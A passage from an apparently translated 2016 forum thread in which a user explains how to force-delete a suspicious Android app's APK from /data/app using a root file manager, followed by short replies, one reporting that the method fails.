Here is one method: with MT Manager or RE (Root Explorer), open the root directory (mounted read/write), go to data/app/com.google.process.locations-1.apk,
find this app and delete it!

Note: it is easy to find if you set the file sort order (by time).
This way you can skip deactivating it and force-delete this kind of software.
#7
zxc逆天, posted 2016-1-16 18:54 from mobile
Nice analysis, upvoted.
#8
flyflying, posted 2016-2-2 16:16
Notice: the author has been banned or deleted; content automatically hidden
#9
KD3650, posted 2016-11-12 17:13
It really can't be uninstalled; deleting the apk under the /data partition with RE doesn't work either.